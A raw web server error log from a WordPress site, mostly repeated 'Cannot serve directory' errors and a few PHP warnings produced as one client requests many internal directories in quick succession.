(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:25.700492 2024] [autoindex:error] [pid 10815:tid 140676629411584] [client 45.8.19.69:44158] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:26.496554 2024] [autoindex:error] [pid 10814:tid 140676452792064] [client 45.8.19.69:44162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:26.580229 2024] [autoindex:error] [pid 10813:tid 140676477970176] [client 45.8.19.69:44164] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:29.413099 2024] [autoindex:error] [pid 11448:tid 140676419221248] [client 45.8.19.69:44174] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:29.496666 2024] [autoindex:error] [pid 11448:tid 140676511540992] [client 45.8.19.69:44176] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:30.281628 2024] [autoindex:error] [pid 11448:tid 140676545111808] [client 45.8.19.69:44180] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:30.365899 2024] [autoindex:error] [pid 12849:tid 140676629411584] [client 45.8.19.69:44182] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:31.932923 2024] [autoindex:error] [pid 11448:tid 140676444399360] [client 45.8.19.69:44194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:33.484362 2024] [autoindex:error] [pid 10814:tid 140676477970176] [client 45.8.19.69:44200] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:33.573998 2024] [autoindex:error] [pid 12849:tid 140676646196992] [client 45.8.19.69:44202] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:35.088717 2024] [autoindex:error] [pid 10814:tid 140676629411584] [client 45.8.19.69:44208] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:35.941283 2024] [autoindex:error] [pid 10814:tid 140676637804288] [client 45.8.19.69:44212] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:40.140410 2024] [autoindex:error] [pid 12849:tid 140676402435840] [client 45.8.19.69:44226] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:41.552071 2024] [autoindex:error] [pid 10814:tid 140676385650432] [client 45.8.19.69:44232] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:43.644636 2024] [autoindex:error] [pid 12805:tid 140676637804288] [client 45.8.19.69:44240] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/03/19 12:16:43 [error] 10714#10714: *29637 "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-admin/index.html" is not found (2: No such file or directory), client: 45.8.19.69, server: investigacionperu.com, request: "GET /.well-known/pki-validation/wp-admin/ HTTP/1.1", host: "investigacionperu.com" [Tue Mar 19 12:16:45.816178 2024] [autoindex:error] [pid 10814:tid 140676444399360] [client 45.8.19.69:44248] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:45.904032 2024] [autoindex:error] [pid 12805:tid 140676553504512] [client 45.8.19.69:44250] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:45.992286 2024] [autoindex:error] [pid 10815:tid 140676444399360] [client 45.8.19.69:44252] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:46.080165 2024] [autoindex:error] [pid 12735:tid 140676427613952] [client 45.8.19.69:44254] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:46.820807 2024] [autoindex:error] [pid 11448:tid 140676536719104] [client 45.8.19.69:44258] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:48.253007 2024] [autoindex:error] [pid 12843:tid 140676461184768] [client 45.8.19.69:44264] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:52.936335 2024] [autoindex:error] [pid 12805:tid 140676519933696] [client 45.8.19.69:44282] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:53.021616 2024] [autoindex:error] [pid 12849:tid 140676486362880] [client 45.8.19.69:44284] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/08/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:56.129251 2024] [autoindex:error] [pid 10814:tid 140676536719104] [client 45.8.19.69:44294] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:59.228459 2024] [autoindex:error] [pid 10814:tid 140676486362880] [client 45.8.19.69:44306] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:00.011010 2024] [autoindex:error] [pid 12735:tid 140676553504512] [client 45.8.19.69:44310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:00.905289 2024] [autoindex:error] [pid 12735:tid 140676469577472] [client 45.8.19.69:44314] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:01.741542 2024] [autoindex:error] [pid 10814:tid 140676511540992] [client 45.8.19.69:44318] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:02.608379 2024] [autoindex:error] [pid 10815:tid 140676545111808] [client 45.8.19.69:44322] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:03.421037 2024] [autoindex:error] [pid 10814:tid 140676528326400] [client 45.8.19.69:44326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:06.374237 2024] [autoindex:error] [pid 12805:tid 140676494755584] [client 45.8.19.69:44336] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:12.104384 2024] [autoindex:error] [pid 12735:tid 140676637804288] [client 45.8.19.69:44354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:12.868282 2024] [autoindex:error] [pid 10814:tid 140676452792064] [client 45.8.19.69:44358] AH01276: Cannot serve directory /home/investig/public_html/images/icons/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:13.712982 2024] [autoindex:error] [pid 11448:tid 140676654589696] [client 45.8.19.69:44362] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:15.262374 2024] [autoindex:error] [pid 12735:tid 140676394043136] [client 45.8.19.69:44368] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:16.878145 2024] [autoindex:error] [pid 10814:tid 140676646196992] [client 45.8.19.69:44374] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:16.962183 2024] [autoindex:error] [pid 10815:tid 140676528326400] [client 45.8.19.69:44376] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:18.600930 2024] [autoindex:error] [pid 11448:tid 140676477970176] [client 45.8.19.69:44382] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:19.460612 2024] [autoindex:error] [pid 12735:tid 140676654589696] [client 45.8.19.69:44386] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:23.353907 2024] [autoindex:error] [pid 12805:tid 140676385650432] [client 45.8.19.69:44398] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:26.184295 2024] [autoindex:error] [pid 12849:tid 140676545111808] [client 45.8.19.69:44412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:29.020665 2024] [autoindex:error] [pid 10814:tid 140676402435840] [client 45.8.19.69:44422] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:30.556088 2024] [autoindex:error] [pid 12849:tid 140676528326400] [client 45.8.19.69:44428] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:30.704711 2024] [autoindex:error] [pid 12843:tid 140676637804288] [client 45.8.19.69:44430] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:37.577646 2024] [autoindex:error] [pid 11448:tid 140676486362880] [client 45.8.19.69:44458] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:41.633871 2024] [autoindex:error] [pid 10814:tid 140676410828544] [client 45.8.19.69:44472] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:43.168429 2024] [autoindex:error] [pid 11448:tid 140676419221248] [client 45.8.19.69:44478] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/lib/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:45.496609 2024] [autoindex:error] [pid 10813:tid 140676444399360] [client 45.8.19.69:44486] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:47.843378 2024] [:error] [pid 12849:tid 140676436006656] [client 45.8.19.69:44494] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Mar 19 12:17:47.843675 2024] [:error] [pid 12849:tid 140676436006656] [client 45.8.19.69:44494] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Mar 19 12:17:47.843860 2024] [:error] [pid 12849:tid 140676436006656] [client 45.8.19.69:44494] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Mar 19 12:17:47.844065 2024] [:error] [pid 12849:tid 140676436006656] [client 45.8.19.69:44494] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Mar 19 12:17:47.933226 2024] [autoindex:error] [pid 12805:tid 140676461184768] [client 45.8.19.69:44496] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentynineteen/inc/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:50.812179 2024] [autoindex:error] [pid 12843:tid 140676427613952] [client 45.8.19.69:44508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/avatar/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:52.804034 2024] [autoindex:error] [pid 12849:tid 140676511540992] [client 45.8.19.69:44518] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:17:59.113897 2024] [autoindex:error] [pid 12735:tid 140676427613952] [client 45.8.19.69:44544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:04.225058 2024] [authz_core:error] [pid 10814:tid 140676511540992] [client 45.8.19.69:44560] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/views/ [Tue Mar 19 12:18:06.520480 2024] [autoindex:error] [pid 12805:tid 140676444399360] [client 45.8.19.69:44568] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:08.353494 2024] [autoindex:error] [pid 10814:tid 140676519933696] [client 45.8.19.69:44574] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/shortcode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:18:10.089769 2024] [autoindex:error] [pid 12805:tid 140676410828544] [client 45.8.19.69:44580] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex 